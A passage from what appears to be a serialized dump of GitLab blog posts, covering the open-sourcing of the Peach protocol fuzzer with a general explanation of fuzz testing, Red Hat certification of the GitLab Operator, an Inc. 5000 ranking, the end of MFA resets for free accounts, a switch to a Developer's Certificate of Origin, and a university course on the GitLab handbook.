release](/releases/2020/09/22/gitlab-13-4-released/#api-fuzz-testing-with-openapi-specs-or-har-files).\nSince then we’ve made tons of improvements, such as [adding Postman support](https://about.gitlab.com/releases/2020/11/22/gitlab-13-6-released/#postman-collection-support-for-api-fuzz-testing)\nand [supporting runtime value overrides](https://gitlab.com/gitlab-org/gitlab/-/issues/273111), and we've received great feedback.\nWe’ve also heard the questions about the Peach protocol fuzz testing\ncapabilities and what is going to happen to them.\n\nToday, we are incredibly excited to announce that we are releasing the core\nprotocol fuzz testing engine of Peach as [GitLab Protocol Fuzzer Community Edition](https://gitlab.com/gitlab-org/security-products/protocol-fuzzer-ce), and it's open source! This edition has many\ncapabilities previously only available with a commercial Peach license.\nIt contains the engine to run and orchestrate fuzz tests as well as the\npieces needed to define your own protocols.\n\n## This is a major gain for the open source community\n\nPreviously, the only way\nto get access to many of these tools was to pay for the commercial\nversion of Peach Fuzzer, or to use an older, unmaintained version of Peach Fuzzer\nCommunity that lacked many of the features and bug fixes available in the commercial version.\nBy open sourcing much of what\nwas previously available only with a paid license, we are thrilled to\nenable more security researchers, students, and developers to experiment\nwith and use protocol fuzz testing to find vulnerabilities and bugs\nthat other tools will not. This also enables everyone to contribute and\nhelp advance the state of the art even further!\n\n## What is fuzz testing?\n\nFuzz testing is an automated software testing technique that provides invalid, unexpected, or random data to a computer program. 
Like black box testing, a fuzzing tool injects these unexpected inputs into the system and monitors for negative reactions such as crashes or information leakage, which could indicate security, performance, or quality gaps or issues.\nThe goal is to reveal software defects and vulnerabilities. \n\nThe name “fuzzing” dates back to 1988 when the University of Wisconsin - Madison Professor Barton Miller noticed significant interference on the signal while logging into a UNIX system via a dial-up network during a storm. The interference ultimately resulted in a crash.\n\nLater, Miller decided to have his students conduct a simulation of his experience with the idea that external “noise” couldn’t be tolerated by code. They blasted UNIX, Mac, and Windows systems with noise using a fuzz generator to see if they would crash.\n\n## What is a peach fuzzer?\n\nPeach is a SmartFuzzer that provides a way to define the format of data that should be generated as well as how and when the fuzzed data should be generated.\nIt requires the creation of Peach Pit files, which are XML files that contain complete information about the data structure, type of information, and the relationship of the data. The files define the structure, type of information, and relationships in the data to be fuzzed.\nAdditionally, it allows for the configuration of a fuzzing run, including selecting a data transport ([Publisher](https://peachtech.gitlab.io/peach-fuzzer-community/v3/Publisher.html)), logging interface, etc.\nPeach has been under development since 2004.\n\n### What a peach fuzzer does\n\nA peach fuzzer is capable of performing both [generation and mutation-based](https://peachtech.gitlab.io/peach-fuzzer-community/GenerationMutationFuzzing.html) fuzzing.\n\n### Benefits of a peach fuzzer\n\nA peach fuzzer tool is easy to use and allows for efficient testing and standardized reporting suitable for all stakeholders. 
Tests are repeatable, and findings can be verified and validated across multiple testing sessions.\n\n## Benefits and challenges of fuzz testing\n\nBecause of its random nature, experts believe fuzz testing is most likely to find bugs that other conventional tests and manual audits miss. Some of its other many benefits include:\n \n- Providing a good overall picture of the quality of the target system and software. Fuzzing tools let you easily assess the robustness and security risk posture of the system and software being tested.\n- Fuzzing is the main technique malicious hackers use to find software vulnerabilities. When used in a security program, it helps prevent zero-day exploits from unknown bugs and weaknesses in your system.\n- Reduced cost and time. Once a fuzzer is up and running, it can start to look for bugs on its own, with no manual intervention, and can continue to do so for as long as needed.\n\nSetup and data analysis are the two main challenges practitioners face when trying to implement fuzz testing. It also isn’t easy to set up fuzz testing--it requires complex testing “harnesses” that can be even more tricky to create if the fuzz testing isn’t actually located within an existing toolchain.\n\nFurther, fuzz testing can generate a lot of data, including potentially false positives. So it’s critical that a testing team is prepared to deal with the onslaught of information.\n\nThere is also a perception issue. Because it is less easy to document, negative attitudes toward the “vague” nature of fuzz testing persist in the QA community.\n\n## How to get started with fuzz testing\n\nFuzzing, like another aspect of a software project, requires planning, maintenance, and commitment.\nFirst, figure out what you want to fuzz, what you want to find, and how you are going to fuzz. 
Then you will want to make sure the tool you’re going to use is flexible enough to cover all uses.\n\nIf you are setting up a fuzzing system but aren’t one of the developers who will actually fix the results found, communicating with the people will be. Ask about the kind of information they want to receive in a bug report from fuzz testing.\n\nAt the very least, a bug report should contain all the information required to reproduce the issue. This may include test case, configuration, operating system used, version or build number of the target, CPU and memory information, and, where applicable, compiler options and debug flags.\n \nIf no new bugs are found after running the fuzz test for a long period of time, this might indicate your fuzzing is either doing a great job, and the robustness of your target is increasing—or that the fuzz is stuck.\n\n## Some fuzz testing best practices\n\nTo ensure the efficiency of your fuzz software and security testing, make sure to follow these best practices:  \n\n- Determine what the target software is to be developed\n- Identify the inputs for the data to be tested\n- Generate your fuzz data  \n- Use the generated fuzz data to execute the test   \n- Monitor the system for potential security vulnerabilities, crashes, and memory leaks  \n- Check defects in the log so they can be addressed before the product is released\n\n## How to use fuzz testing in GitLab\n\nGitlab recommends doing fuzz testing in addition to the other security scanners in [GitLab Secure](https://docs.gitlab.com/ee/user/application_security/index.html) and your own test processes. If you’re using [GitLab CI/CD](https://docs.gitlab.com/ee/ci/index.html), you can run your coverage-guided fuzz testing as part of your CI/CD workflow.\nWeb API fuzzing runs in the fuzz stage of the CI/CD pipeline. 
To ensure API fuzzing scans the latest code, your CI/CD pipeline should deploy changes to a test environment in one of the stages preceding the fuzz stage.\n\nThe following changes have been made to the API fuzzing template:\n\n- In GitLab 14.0 and later, you must define a fuzz stage in your .gitlab-ci.yml file.\n- In GitLab 13.12 and earlier, the API fuzzing template defines the build, test, deploy, and fuzz stages. The fuzz stage runs last by default. The predefined stages were deprecated and removed from the API-Fuzzing.latest.gitlab-ci.yml template. They will be removed in a future GitLab version.\n\nIf your pipeline is configured to deploy to the same web server on each run, running a pipeline while another is still running could cause a race condition in which one pipeline overwrites the code from another. The API to scan should be excluded from changes for the duration of a fuzzing scan.\n \nThe only changes to the API should be from the fuzzing scanner. Any changes made to the API (for example, by users, scheduled tasks, database changes, code changes, other pipelines, or other scanners) during a scan could cause inaccurate results.\n\nYou can run a [Web API fuzzing scan](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/) using the following methods:\n\n- OpenAPI Specification - versions 2 and 3.\n- GraphQL Schema\n- HTTP Archive (HAR)\n- Postman Collection - versions 2.0 or 2.1\n\nExample projects using these methods are available:\n\n- Example OpenAPI v2 Specification project\n- Example HTTP Archive (HAR) project\n- Example Postman Collection project\n- Example GraphQL project\n- Example SOAP project\n\nMore information about web API fuzz testing in GitLab can be found [here](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/).\n\n## Future plans for fuzz testing\n\nWe plan to add additional capabilities to the Community Edition in the future\nand integrate it into GitLab the product. 
You can read more details about our\nfuture plans on our [fuzz testing direction page](/direction/secure/dynamic-analysis/fuzz-testing/).\nWe will keep our [stewardship policy](/company/stewardship/) in mind as we [determine which tiers of GitLab that specific features\nare added to](/handbook/product/tiering-guidance-for-features/). Some of the capabilities you can look forward to are\nindustry-specific features, tighter integration with the CI process and vulnerability\nmanagement, as well as pre-built support for many common network protocols.\n\nOne of our values at GitLab is [iteration](https://handbook.gitlab.com/handbook/values/#iteration) and we wanted to share the Community\nEdition as soon as we could so everyone can contribute sooner! We would\nlove for you to check it out and provide feedback and your own contributions.\n",[9,930],{"slug":2565,"featured":6,"template":689},"gitlab-open-sources-protocol-fuzz-test-engine","content:en-us:blog:gitlab-open-sources-protocol-fuzz-test-engine.yml","Gitlab Open Sources Protocol Fuzz Test Engine","en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine.yml","en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine",{"_path":2571,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2572,"content":2578,"config":2584,"_id":2586,"_type":14,"title":2587,"_source":16,"_file":2588,"_stem":2589,"_extension":19},"/en-us/blog/gitlab-operator-red-hat-certification",{"title":2573,"description":2574,"ogTitle":2573,"ogDescription":2574,"noIndex":6,"ogImage":2575,"ogUrl":2576,"ogSiteName":673,"ogType":674,"canonicalUrls":2576,"schema":2577},"GitLab Operator certified by Red Hat OpenShift","The GitLab Operator is now certified by Red Hat’s OpenShift standards, allowing users to install GitLab directly on an OpenShift cloud cluster.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682717/Blog/Hero%20Images/bi_worldwise_casestudy_image.png","https://about.gitlab.com/blog/gitlab-operator-red-hat-certification","\n    
                    {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Operator certified by Red Hat OpenShift\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dilan Orrino\"}],\n        \"datePublished\": \"2023-05-11\",\n      }",{"title":2573,"description":2574,"authors":2579,"heroImage":2575,"date":2581,"body":2582,"category":10,"tags":2583},[2580],"Dilan Orrino","2023-05-11","\nGitLab and Red Hat have been technology partners for more than two years, collaborating on a number of projects. GitLab first started its integration with Red Hat’s OpenShift cloud-based container platform by introducing the [GitLab Runner Operator](https://catalog.redhat.com/software/container-stacks/detail/5e9877e96c5dcb34dfbb1ac9) in GitLab Version 13.3. The Runner Operator offered the capability to run pipeline tasks from an external GitLab instance to OpenShift clusters.\n\nOur next step was to more closely integrate with the OpenShift platform and alleviate the need to require the GitLab instance to run external to OpenShift-based infrastructure. [The GitLab Operator](https://docs.gitlab.com/operator/) is now certified by Red Hat, which enables the capability to install an instance of GitLab inside of an OpenShift cloud cluster.\n\n## Benefits of GitLab with Red Hat OpenShift\n\nThe [Operator framework](https://operatorframework.io/about/) offers many benefits, but the main reason we identified is that it would allow us to run a self-managed instance of GitLab inside an OpenShift cluster. The GitLab DevSecOps platform can be operated on the same trusted infrastructure as other applications and services within a customer's organization. \n\nThe Operator framework also delivers a streamlined installation and seamless version upgrades. 
As the GitLab Operator continues to be developed, we hope to add other elements of the Operator framework such as backup and recovery, comprehensive metrics, and auto-tuning and auto-scaling. GitLab plans to align our future cloud-native deployment model behind our Operator.\n\n![Capability model](https://about.gitlab.com/images/blogimages/gitlaboperatorcapabilitymodel.png){: .shadow}\n\n\n## Details of the Red Hat certification\n\nThe Red Hat Certification included aligning our application components with Red Hat’s Universal Base Image (UBI) when deploying through the Red Hat Marketplace. The Red Hat Certification also included meeting all of [Red Hat’s policy requirements](https://access.redhat.com/documentation/en-us/red_hat_software_certification/8.61#con-operator-requirements_openshift-sw-cert-policy-products-managed). The certification signifies GitLab being supported on OpenShift in collaboration with Red Hat. The Operator as a deployment method will be available as a recommended choice in Q3, but is available for testing now.\n\n## A technical milestone\n\nThe GitLab application is complex, so building an Operator to deploy it was a technical achievement for the GitLab and Red Hat engineering teams. Completing this operator certification is a significant milestone and gives customers the confidence and assurance that GitLab runs effectively, jointly supported by Red Hat, on OpenShift.\n\n![GitLab Operator install screen](https://about.gitlab.com/images/blogimages/gitlaboperatorinstall.png){: .shadow}\n\n\n## Try the GitLab Operator\n\n[The GitLab Operator](https://docs.gitlab.com/operator/) is available now for testing in the OpenShift console via the embedded OperatorHub, and will be production ready for GitLab instances in Q3 2023. Check out the [catalog listing](https://catalog.redhat.com/software/container-stacks/detail/5ec3fcb08b6f188e53644c0f) for links to documentation and installation instructions. 
For a self-managed free trial to host GitLab on your OpenShift cluster, [submit this form](/free-trial/?hosted=self-managed).\n",[282,9,845],{"slug":2585,"featured":6,"template":689},"gitlab-operator-red-hat-certification","content:en-us:blog:gitlab-operator-red-hat-certification.yml","Gitlab Operator Red Hat Certification","en-us/blog/gitlab-operator-red-hat-certification.yml","en-us/blog/gitlab-operator-red-hat-certification",{"_path":2591,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2592,"content":2598,"config":2603,"_id":2605,"_type":14,"title":2606,"_source":16,"_file":2607,"_stem":2608,"_extension":19},"/en-us/blog/gitlab-ranked-44-on-inc-5000-list",{"title":2593,"description":2594,"ogTitle":2593,"ogDescription":2594,"noIndex":6,"ogImage":2595,"ogUrl":2596,"ogSiteName":673,"ogType":674,"canonicalUrls":2596,"schema":2597},"GitLab ranks 4th on Inc. 5000 fastest-growing software list","GitLab ranked 4th fastest-growing private software company (#44 overall) on the Inc. 5000 list. How did we achieve such a strong rank among 2018's fastest-growing companies? Here's what we think.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682941/Blog/Hero%20Images/inc-5000-2018.png","https://about.gitlab.com/blog/gitlab-ranked-44-on-inc-5000-list","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab ranked 4th fastest-growing private software company on Inc. 5000 list of 2018's fastest growing companies\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-08-16\",\n      }",{"title":2599,"description":2594,"authors":2600,"heroImage":2595,"date":1860,"body":2601,"category":299,"tags":2602},"GitLab ranked 4th fastest-growing private software company on Inc. 5000 list of 2018's fastest growing companies",[970],"\nPop the champagne! 
GitLab is now one of America's fastest-growing private companies, ranking as the 4th fastest-growing private software company (44th overall) on this year's [Inc. 5000 list](https://www.inc.com/inc5000/list/2018) with revenue growth of 6,213 percent over the past three years. This is the first year GitLab has appeared on Inc.'s 5000 list and we're happy to have such a strong showing.\n\n## Not just Git anymore\n\nWith humble beginnings as a simple Git repository manager, GitLab is now the only single application for the entire software development and operations lifecycle. Built on the philosophy that '[everyone can contribute](/company/mission/#mission),' GitLab allows product, engineering, quality assurance, operations, and security teams to work together at the same time in the same app, eliminating handoffs and bottlenecks and accelerating cycle time. From project planning and source code management, to CI/CD and monitoring, GitLab has everything businesses need for end-to-end [DevOps](/topics/devops/).\n\n## How we move so fast\n\nOur velocity of product innovation is largely thanks to our robust open source community of [more than 2,000 contributors](http://contributors.gitlab.com/). Our [open issue tracker](https://gitlab.com/gitlab-org/gitlab-ce/issues) allows anyone to comment on and contribute to the code we are co-creating with more than 100,000 organizations worldwide, including NASA, NASDAQ, Sony, and Bayer. This is just one of the ways we strive to live our [value of openness and transparency](https://handbook.gitlab.com/handbook/values/#transparency).\n\nOur customers are always telling us that they want to spend their engineering resources on writing code that makes money for the company instead of reinventing the wheel. By using GitLab they get to leverage the collective experience of over 100,000 organizations. They know they've got not only a great product today, but a strategic partner for the future. 
This collaborative spirit is how we're not only delivering new functionality fast (so fast, we're running out of space on the slide below 😁), but also shipping code that solves real-world problems, which accounts for the pace of our revenue growth.\n\n[![GitLab exponential rate of product development](https://about.gitlab.com/images/blogimages/gitlab-product-improvement-velocity.png)](/direction/)\n\nBeing on the Inc. 5000 list is an honor and a big milestone, but we're just getting started. We have no intention of slowing down as we look to build best-in-class functionality across every part of the DevOps lifecycle.\n\n#### About the Inc. 5000 list\n\nThis year's Inc. 5000 ranking system is based on the percentage of revenue growth qualifying companies saw from 2014 to 2017. For consideration, companies needed to be private, for-profit, independent and U.S.-based as of December 31, 2017. The companies must have also been incorporated by March 31, 2014 with a minimum revenue of $200,000 for that year and $2 million for 2017.\n",[930,9],{"slug":2604,"featured":6,"template":689},"gitlab-ranked-44-on-inc-5000-list","content:en-us:blog:gitlab-ranked-44-on-inc-5000-list.yml","Gitlab Ranked 44 On Inc 5000 List","en-us/blog/gitlab-ranked-44-on-inc-5000-list.yml","en-us/blog/gitlab-ranked-44-on-inc-5000-list",{"_path":2610,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2611,"content":2616,"config":2622,"_id":2624,"_type":14,"title":2625,"_source":16,"_file":2626,"_stem":2627,"_extension":19},"/en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users",{"title":2612,"description":2613,"ogTitle":2612,"ogDescription":2613,"noIndex":6,"ogImage":1211,"ogUrl":2614,"ogSiteName":673,"ogType":674,"canonicalUrls":2614,"schema":2615},"GitLab Support is no longer processing MFA resets for free users","From August 15th, GitLab Support will no longer be manually removing MFA from free 
accounts.","https://about.gitlab.com/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Support is no longer processing MFA resets for free users\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lyle Kozloff\"}],\n        \"datePublished\": \"2020-08-04\",\n      }",{"title":2612,"description":2613,"authors":2617,"heroImage":1211,"date":2619,"body":2620,"category":930,"tags":2621},[2618],"Lyle Kozloff","2020-08-04","\n\nBack in 2018, I wrote a blog post on [Keeping your GitLab account safe (and accessible)](/blog/keeping-your-account-safe/) in which I outlined some of the ways that our users could make sure that they were keeping their accounts secure and recoverable.\n\nFast-forward to 2020 and GitLab as a company has matured. Today our users are starting to face attack-vectors that were previously unheard of on GitLab.com. As a result, we don’t want our security practices to be only going through the motions of security. We’ve all seen examples of companies whose Multi-Factor Authentication (MFA) reset policies negate the security benefits of MFA on accounts. \n\nToday we’re announcing a change that will put account security wholly in the hands of our users.\n\n**As of Aug. 15th, 2020, GitLab Support will no longer process MFA resets for free accounts.**\n\nThis change means that if you’re using GitLab with MFA you will want to ensure that you have an appropriate set of backup methods to recover your account.\n\nNamely:\n- (Re)generate recovery codes and store them in a secure location\n- Use a hardware token whenever possible\n- Add an [SSH key](/solutions/source-code-management/) to your account to allow the generation of backup codes\n\nIf you are caught where you are not able to provide your MFA token and without these backup methods,  your account will be irrecoverable. 
\n\n### FAQ:\n\n#### What if I accidentally lose my phone/recovery keys or get a new laptop and forget to back up my SSH key?\n\nIf you lose your primary authentication method and all backup methods, your account will be irrecoverable.\n\n#### What if this is a work account?\n\nFor accounts occupying a paid seat, created with a company email address, [MFA resets can still be requested](/handbook/support/workflows/account_verification.html#access-with-support-intervention). There will be a minimum three business-day processing time and you'll be required to pass a number of security challenges to verify account ownership.\n\n#### I don’t like this and I want to tell someone.\n\nWe’re [accepting community feedback in this forum post](https://forum.gitlab.com/t/draft-gitlab-support-is-no-longer-processing-mfa-resets-for-free-users/40905), and invite contributors to share there. \n\n#### Can I add my phone number as a recovery method?\n\nWe’re discussing this in the [forum post](https://forum.gitlab.com/t/draft-gitlab-support-is-no-longer-processing-mfa-resets-for-free-users/40905), but phone numbers as a recovery method are problematic in many countries. \n\n#### Can I add X as a recovery method?\n\nGitLab is developed in collaboration with the wider community. 
We’re accepting merge requests and feature proposals in [gitlab.com/gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab/) and look forward to building together.\n\n_Learn more about [security best practices for your GitLab instance](/blog/gitlab-instance-security-best-practices/)._\n{: .alert .alert-info .text-center}\n",[267,865,930,9],{"slug":2623,"featured":6,"template":689},"gitlab-support-no-longer-processing-mfa-resets-for-free-users","content:en-us:blog:gitlab-support-no-longer-processing-mfa-resets-for-free-users.yml","Gitlab Support No Longer Processing Mfa Resets For Free Users","en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users.yml","en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users",{"_path":2629,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2630,"content":2635,"config":2640,"_id":2642,"_type":14,"title":2643,"_source":16,"_file":2644,"_stem":2645,"_extension":19},"/en-us/blog/gitlab-switches-to-dco-license",{"title":2631,"description":2632,"ogTitle":2631,"ogDescription":2632,"noIndex":6,"ogImage":900,"ogUrl":2633,"ogSiteName":673,"ogType":674,"canonicalUrls":2633,"schema":2634},"We're switching to a DCO for source code contributions","We want to make it even easier for everyone to contribute, by doing away with our Contributor License Agreement in favor of the Developer's Certificate of Origin.","https://about.gitlab.com/blog/gitlab-switches-to-dco-license","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're switching to a DCO for source code contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Hurewitz\"}],\n        \"datePublished\": \"2017-11-01\",\n      }",{"title":2631,"description":2632,"authors":2636,"heroImage":900,"date":2637,"body":2638,"category":299,"tags":2639},[1054],"2017-11-01","\n\nWe're committed to being [good stewards of open 
source](/blog/being-a-good-open-source-steward/),\nand part of that commitment means we never stop re-evaluating how we do that.\nSaying \"everyone can contribute\" is about removing barriers to contribution.\nFor some of our community, the Contributor License Agreement is a deterrent to\ncontributing to GitLab, so we're changing to a Developer's Certificate of Origin instead.\n\n\u003C!-- more -->\n\nMany large open source projects want to be masters of their own destiny.\nHaving the freedom to run your own infrastructure based on open source software,\ntogether with the ability to modify and audit source code and not be dependent\non a vendor, makes open source appealing. We want GitLab to be an option for everyone.\n\n## Why the change?\n\nA Contributor License Agreement (CLA) is the industry standard for open source\ncontributions to other projects, but it's unpopular with developers, who don't\nwant to enter into legal terms and are put off by having to review a lengthy\ncontract and potentially give up some of their rights. Contributors find the\nagreement unnecessarily restrictive, and it's deterring developers of open\nsource projects from using GitLab. We were approached by Debian developers to\nconsider dropping the CLA, and that's what we're doing.\n\n## What's changing?\n\nAs of today, we're rolling out changes so that contributors to the GitLab [source\ncode](/solutions/source-code-management/) will only be required to make contributions and bug fixes under a project\nlicense (MIT for all repositories with the exception of Omnibus which would be\nlicensed under Apache) and a [Developer's Certificate of Origin](https://developercertificate.org/) (DCO).\nThe DCO gives developers greater flexibility and portability for their\ncontributions, and it's one of the reasons that Debian and GNOME plan to migrate\ntheir communities and projects to GitLab. We hope this change\nencourages more developers to contribute to GitLab. 
Thank you Debian, for\nprompting us to make this change.\n\n> \"We applaud GitLab for dropping their CLA in favor of a more OSS-friendly\napproach. Open source communities are born from a sea of contributions that come\ntogether and transform into projects. This gesture affirmed GitLab's willingness\nto protect the individual, their creative process, and most importantly, keeps\nintellectual property in the hands of the creator.\" - Carlos Soriano, Board Director at GNOME\n\n>\"We’re thrilled to see GitLab simplifying and encouraging community\ncontributions by switching from a CLA to the DCO. We recognize that making a\nchange of this nature is not easy and we applaud the time, patience and\nthoughtful consideration GitLab has shown here.\" - Chris Lamb, Debian Project Leader\n\nYou can [read the analysis that informed our decision](https://docs.google.com/a/gitlab.com/document/d/1zpjDzL7yhGBZz3_7jCjWLfRQ1Jryg1mlIVmG8y6B1_Q/edit?usp=sharing).\nRead all about our [stewardship of GitLab Community Edition](/company/stewardship/).\n",[9,930,267],{"slug":2641,"featured":6,"template":689},"gitlab-switches-to-dco-license","content:en-us:blog:gitlab-switches-to-dco-license.yml","Gitlab Switches To Dco License","en-us/blog/gitlab-switches-to-dco-license.yml","en-us/blog/gitlab-switches-to-dco-license",{"_path":2647,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2648,"content":2654,"config":2661,"_id":2663,"_type":14,"title":2664,"_source":16,"_file":2665,"_stem":2666,"_extension":19},"/en-us/blog/gitlab-taught-in-korean-uni",{"title":2649,"description":2650,"ogTitle":2649,"ogDescription":2650,"noIndex":6,"ogImage":2651,"ogUrl":2652,"ogSiteName":673,"ogType":674,"canonicalUrls":2652,"schema":2653},"Schooled in GitLab: Teaching our handbook at a South Korean university","Students at Hankuk University of Foreign Studies tackled our handbook. 
The students' favorite topics were compensation and remote work.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673044/Blog/Hero%20Images/books-internship-post.jpg","https://about.gitlab.com/blog/gitlab-taught-in-korean-uni","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Schooled in GitLab: Teaching our handbook at a South Korean university\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Guenjun Yoo\"}],\n        \"datePublished\": \"2020-01-29\",\n      }",{"title":2649,"description":2650,"authors":2655,"heroImage":2651,"date":2657,"body":2658,"category":10,"tags":2659},[2656],"Guenjun Yoo","2020-01-29","\nBusiness students at [Hankuk University of Foreign Studies](http://mis.hufs.ac.kr/) in Seoul, South Korea are studying the GitLab handbook and business model. The students are enthusiastic about GitLab and its story, says lecturer SanJoon Song in an email interview, but there was one problem: Our 3,000+ page handbook is a lot to swallow in one semester.\n\nSo Song had the class divide the handbook into 15 different categories, which different groups of students researched over the course of the semester. At the end of the term, the groups presented a summary of their category to the class.\n\n“Many engineers in Korea said that the GitLab handbook is good to read before starting up a business,” says Song. “However, there is a lot of reading in the handbook; too many pages for me.”\n\nThe level of transparency in the handbook was a revelation to Song and his students.\n\n“We didn't study [the handbook] only to focus on the content itself, but we tried to understand and share about the context of handbook; what conventions GitLab has and what protocols GitLab is trying to develop with its employees by this handbook,” says Song. 
“In Korea, this is very unusual to share such details of company goals and protocols with entire employees by handbook and for me, this approach is very new and fresh.”\n\n## Inside information\n\nSong was very surprised by how much “insider” information is available in our handbook and says he’s particularly amazed by the detailed explanations of what to do if things go wrong.\n\nOn the other hand, his students were most impressed by the details on [compensation](/handbook/total-rewards/compensation/compensation-calculator/calculator/) and incentives in the handbook, followed closely by the idea of remote work.\n\n“Personally I liked the concept of [‘accept mistakes’](https://handbook.gitlab.com/handbook/values/#accept-mistakes) in the efficiency section,” says Song. “We also talked a lot about GitLab’s [six values](https://handbook.gitlab.com/handbook/values/).”\n\n![Breaking down the handbook](https://about.gitlab.com/images/blogimages/studyingthehandbook.jpg){: .shadow.medium.center}\nStudents in Song's class breaking down the handbook.\n{: .note.text-center}\n\nRemote work was also a big topic of discussion in Song's classroom.\n\n\"Many Koreans are interested in remote work,\" says Song. \"It is really great that people can work anywhere, anytime without having the stress of commuting. Remote work is not common in Korea yet. Only a few software developers are allowed to work from home but that is also partial and in a limited environment only. Many students also want to do the remote work but this is still kind of a dream.”\n\nSong is currently teaching a second GitLab-focused class, this time diving into project management and DevOps by looking at our product and Pivotal Labs. If there is one benefit Song thinks his students have taken away from studying GitLab it’s the importance of communication.\n\n“Communication between employees is one of the most important matters,\" says Song. 
\"By studying the GitLab handbook, my students and I learned an efficient way of communication between the employer and employees. The handbook explicitly shows how GitLab is trying to do the best way of communication between stakeholders; what is the company goal, why we established the goal and how we are achieving the goal.”\n\nSong hopes to inspire a future generation of entrepreneurs by studying the GitLab handbook in the classroom.\n\n“My students have studied the GitLab handbook for one semester. I hope this study can be their reference when they start their startup, so they can create their company goals and prototype in the direction of success, like GitLab.\"\n\n_If you’re interested in seeing more of Song’s curriculum, he shared it\n[here](https://docs.google.com/document/d/1u5J6Ypj6zwQJVjmrl1wd0eIv7Q_TYLJysDquhGMJimA/edit). You'll need to scroll down a bit._\n\nCover image by [Patrick Tomasso](https://unsplash.com/@impatrickt) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1078,267,685,9,2660,888],"remote work",{"slug":2662,"featured":6,"template":689},"gitlab-taught-in-korean-uni","content:en-us:blog:gitlab-taught-in-korean-uni.yml","Gitlab Taught In Korean Uni","en-us/blog/gitlab-taught-in-korean-uni.yml","en-us/blog/gitlab-taught-in-korean-uni",{"_path":2668,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2669,"content":2675,"config":2680,"_id":2682,"_type":14,"title":2683,"_source":16,"_file":2684,"_stem":2685,"_extension":19},"/en-us/blog/gitlab-top-30-highest-velocity-open-source",{"title":2670,"description":2671,"ogTitle":2670,"ogDescription":2671,"noIndex":6,"ogImage":2672,"ogUrl":2673,"ogSiteName":673,"ogType":674,"canonicalUrls":2673,"schema":2674},"We're one of the 30 Highest Velocity Open Source Projects","With a magical combination of number of commits, authors, issues and merge requests, we're in great company with other open source projects with 
momentum.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671330/Blog/Hero%20Images/highest-velocity-open-source-projects.jpg","https://about.gitlab.com/blog/gitlab-top-30-highest-velocity-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're one of the 30 Highest Velocity Open Source Projects\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-07-06\",\n      }",{"title":2670,"description":2671,"authors":2676,"heroImage":2672,"date":2677,"body":2678,"category":10,"tags":2679},[1859],"2017-07-06","\n\nIn June the Cloud Native Computing Foundation released its chart of the [top open source projects with the highest developer velocity](https://www.cncf.io/blog/30-highest-velocity-open-source-projects/), and we're proud to be included – in good company!\n\n\u003C!-- more -->\n\nMeasuring commits, authors, issues and merge or pull requests, the chart places GitLab in the top right quadrant with eight others including [Kubernetes](https://docs.gitlab.com/ee/user/project/clusters/index.html) and [Elasticsearch](https://docs.gitlab.com/ee/integration/elasticsearch.html).\n\n![CNCF highest velocity open source projects chart](https://about.gitlab.com/images/blogimages/CNCF-highest-velocity-open-source-chart.png){: .shadow}\n\n## Open Source at Heart\n\nWhile ['open core'](/blog/gitlab-is-open-core-github-is-closed-source/) might be a more accurate description of GitLab, as we ship both an [open source version](/pricing/feature-comparison/) and [closed source version](/pricing/), we adopt an open source approach to both, with a publicly viewable issue tracker and license that allows modifications once you purchase a license.\n\nWe already know that there are good reasons [why you should choose to work with open source projects](/blog/why-choose-open-source/), and we're grateful to our over [1700 
contributors](http://contributors.gitlab.com/contributors) who have helped to shape GitLab – not just the product, but the company too. I work in the Marketing team and am always surprised and pleased when a member of our community pops up in an issue in the [Marketing project](https://gitlab.com/gitlab-com/marketing/issues) to offer some input or share an idea. It's a great reminder that [everyone can contribute](/community/contribute/), and those contributions go far beyond development.\n\nSo, thank you!\n\n## Keep Those Contributions Coming\n\nIf you're new to GitLab, [this will help](/blog/heres-how-new-programmers-can-learn-by-contributing-to-gitlab/), otherwise, as always, feel free to [open or comment on an issue](https://gitlab.com/gitlab-org/gitlab-ce/issues). See [all the ways you can contribute here](/community/contribute/).\n\n[Cover image](https://unsplash.com/search/jaws-haiku-pauwela-united-states?photo=sW8psg40WXY) by [Anton Repponen](https://unsplash.com/@repponen) on Unsplash\n{: .note}\n",[9,930],{"slug":2681,"featured":6,"template":689},"gitlab-top-30-highest-velocity-open-source","content:en-us:blog:gitlab-top-30-highest-velocity-open-source.yml","Gitlab Top 30 Highest Velocity Open 